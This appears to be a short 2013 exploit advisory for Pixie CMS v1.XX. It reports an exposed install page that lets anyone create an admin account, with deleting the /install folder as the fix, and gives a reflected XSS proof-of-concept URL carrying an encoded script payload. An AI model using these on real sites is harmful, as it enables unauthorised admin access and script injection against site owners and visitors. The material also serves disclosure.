facebook facebook twitter rss

Pixie CMS v1.XX Multiple Vulenrabilities

Author: TUNISIAN CYBER , Published: 14-12-2013
[+] Author: TUNISIAN CYBER
[+] Exploit Title: Pixie CMS v1.XX Multiple Vulenrabilities
[+] Date: 14-12-2013
[+] Category: WebApp
[+] Vendor: http://www.getpixie.co.uk/
[+] Google Dork: n/a
[+] Tested on: Win7 , ubuntu 13.04


########################################################################################
I/Add Admin:
http://127.0.0.1/pixie/admin/install/createuser.php
p0c>http://oi39.tinypic.com/2ry3qep.jpg
Fix: Delete /install folder

II/Reflected XSS:
http://127.0.0.1/pixie/admin/?s=login&m=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert%280x0001D6%29%3C/script%3E
p0c>http://oi39.tinypic.com/2ld9hqr.jpg
########################################################################################
Greets to: XMaXtn, N43il HacK3r, XtechSEt

Like us on Facebook :